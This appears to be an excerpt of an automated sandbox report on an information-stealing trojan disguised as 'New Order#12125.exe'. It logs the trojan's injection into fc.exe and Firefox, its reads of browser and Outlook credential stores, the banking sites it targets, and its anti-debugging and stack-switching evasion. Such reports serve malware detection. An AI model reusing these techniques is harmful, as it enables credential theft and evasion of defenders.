              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F0C004_2_036F0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E0CF24_2_036E0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03790CB54_2_03790CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036DD34C4_2_036DD34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A132D4_2_037A132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0373739A4_2_0373739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037912ED4_2_037912ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370B2C04_2_0370B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F52A04_2_036F52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037BB16B4_2_037BB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0372516C4_2_0372516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036DF1724_2_036DF172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FB1B04_2_036FB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A70E94_2_037A70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF0E04_2_037AF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F70C04_2_036F70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379F0CC4_2_0379F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF7B04_2_037AF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037356304_2_03735630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A16CC4_2_037A16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A75714_2_037A7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B95C34_2_037B95C3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378D5B04_2_0378D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E14604_2_036E1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AF43F4_2_037AF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFB764_2_037AFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03765BF04_2_03765BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0372DBF94_2_0372DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370FB804_2_0370FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03763A6C4_2_03763A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFA494_2_037AFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A7A464_2_037A7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379DAC64_2_0379DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03735AA04_2_03735AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378DAAC4_2_0378DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03791AA34_2_03791AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370B9504_2_0370B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F99504_2_036F9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037859104_2_03785910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0375D8004_2_0375D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F38E04_2_036F38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFF094_2_037AFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFFB14_2_037AFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F1F924_2_036F1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F9EB04_2_036F9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A7D734_2_037A7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A1D5A4_2_037A1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F3D404_2_036F3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370FDC04_2_0370FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03769C324_2_03769C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AFCF24_2_037AFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E61FD04_2_02E61FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5CE804_2_02E5CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5D0A04_2_02E5D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B0804_2_02E5B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B07F4_2_02E5B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E511E74_2_02E511E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B1C44_2_02E5B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E5B1D04_2_02E5B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E656804_2_02E65680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E638804_2_02E63880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6387B4_2_02E6387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E7BCD04_2_02E7BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E2F54_2_0349E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E7B34_2_0349E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E57B4_2_0349E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349E4134_2_0349E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349CB134_2_0349CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349D8784_2_0349D878
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeCode function: 7_2_04DBCBFF7_2_04DBCBFF
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860758789_2_0000023F86075878
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F8607657B9_2_0000023F8607657B
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860762F59_2_0000023F860762F5
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F86074B139_2_0000023F86074B13
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860767B39_2_0000023F860767B3
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 9_2_0000023F860764139_2_0000023F86076413
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03737E54 appears 111 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0375EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03725130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0376F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 036DB970 appears 280 times
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: String function: 0157EA12 appears 86 times
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: String function: 01557E54 appears 111 times
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: String function: 0158F290 appears 105 times
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: String function: 014FB970 appears 280 times
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: String function: 01545130 appears 58 times
              Source: New Order#12125.exeStatic PE information: No import functions for PE file found
              Source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000002.1802265375.00000000017A1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1705156829.000000000144E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs New Order#12125.exe
              Source: New Order#12125.exe, 00000000.00000003.1702526408.000000000129F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Order#12125.exe
              Source: New Order#12125.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: New Order#12125.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@16/10
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: New Order#12125.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000004.00000002.3852014344.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3852014344.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3852014344.00000000030F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: New Order#12125.exeVirustotal: Detection: 65%
              Source: New Order#12125.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\New Order#12125.exe "C:\Users\user\Desktop\New Order#12125.exe"
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: New Order#12125.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XcmmvCqVSCAb.exe, 00000003.00000000.1721505934.000000000001E000.00000002.00000001.01000000.00000005.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3849029999.000000000001E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: New Order#12125.exe, New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A3863 push ss; iretd 0_2_002A3880
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A90BB pushad ; iretd 0_2_002A90E4
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_00293490 push eax; ret 0_2_00293492
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A4DC4 pushfd ; retf 0_2_002A4DCE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015009AD push ecx; mov dword ptr [esp], ecx0_2_015009B6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014D135E push eax; iretd 0_2_014D1369
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E09AD push ecx; mov dword ptr [esp], ecx4_2_036E09B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6B011 push cs; retf 4_2_02E6B01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6BB69 push ecx; ret 4_2_02E6BB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6B98E push FFFFFFADh; ret 4_2_02E6B990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E61931 pushfd ; retf 4_2_02E6193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E65C28 pushad ; iretd 4_2_02E65C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6DD8B push eax; iretd 4_2_02E6DDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349B3C8 push edi; ret 4_2_0349B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349B3C4 push edi; ret 4_2_0349B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_034A5202 push eax; ret 4_2_034A5204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_034971EA push es; ret 4_2_034971EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349C033 push ss; iretd 4_2_0349C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349BA5F push cs; retf 4_2_0349BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0349AE60 push ds; retf 4_2_0349AE61
              Source: New Order#12125.exeStatic PE information: section name: .text entropy: 7.995289145928988
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9828Jump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848Thread sleep count: 145 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848Thread sleep time: -290000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848Thread sleep count: 9828 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 7848Thread sleep time: -19656000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948Thread sleep time: -51000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948Thread sleep count: 38 > 30Jump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe TID: 7948Thread sleep time: -38000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6C870 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6C870
              Source: 17O3k-2I.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: discord.comVMware20,11696494690f
              Source: 17O3k-2I.4.drBinary or memory string: AMC password management pageVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: 17O3k-2I.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: 17O3k-2I.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: 17O3k-2I.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: 17O3k-2I.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: firefox.exe, 00000009.00000002.2102683008.0000023F861AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
              Source: 17O3k-2I.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: 17O3k-2I.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: 17O3k-2I.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: fc.exe, 00000004.00000002.3852014344.0000000003020000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3857135034.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: 17O3k-2I.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: 17O3k-2I.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: 17O3k-2I.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: 17O3k-2I.4.drBinary or memory string: global block list test formVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: 17O3k-2I.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: 17O3k-2I.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: 17O3k-2I.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: 17O3k-2I.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: 17O3k-2I.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\New Order#12125.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154096E rdtsc 0_2_0154096E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A7CA3 LdrLoadDll,0_2_002A7CA3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01598158 mov eax, dword ptr fs:[00000030h]0_2_01598158
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506154 mov eax, dword ptr fs:[00000030h]0_2_01506154
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506154 mov eax, dword ptr fs:[00000030h]0_2_01506154
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC156 mov eax, dword ptr fs:[00000030h]0_2_014FC156
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01594144 mov ecx, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01594144 mov eax, dword ptr fs:[00000030h]0_2_01594144
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4164 mov eax, dword ptr fs:[00000030h]0_2_015D4164
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4164 mov eax, dword ptr fs:[00000030h]0_2_015D4164
